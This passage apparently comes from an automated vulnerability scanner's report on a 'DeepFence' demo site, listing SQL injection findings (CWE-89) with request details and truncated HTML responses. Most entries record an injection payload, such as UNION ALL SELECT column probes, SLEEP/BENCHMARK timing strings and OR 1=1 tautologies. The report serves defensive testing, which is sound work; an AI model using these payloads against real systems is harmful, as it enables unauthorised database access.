shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1808\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1809\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1810\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1811\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1812\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1813\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1814\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1815\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1816\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1817\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),\"'\n3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1818Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1819\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1820\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1821\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"x\"=\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 